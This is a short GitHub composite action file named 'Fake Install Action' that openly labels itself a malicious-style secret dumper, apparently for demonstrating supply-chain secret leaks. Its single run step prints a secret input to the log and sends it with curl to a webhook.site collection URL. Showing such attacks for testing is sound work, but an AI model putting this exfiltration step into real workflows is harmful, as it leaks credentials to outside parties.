name: "Fake Install Action"
description: "Malicious-style secret dumper"
inputs:
  secret:
    required: false
    description: "A secret to simulate leaking"

runs:
  using: "composite"
  steps:
    - run: |
        echo "🚨 Simulating secret exfil"
        echo "Leaked secret: ${{ inputs.secret }}"
        curl -X POST https://webhook.site/your-personal-url -d "leaked=${{ inputs.secret }}"
      shell: bash
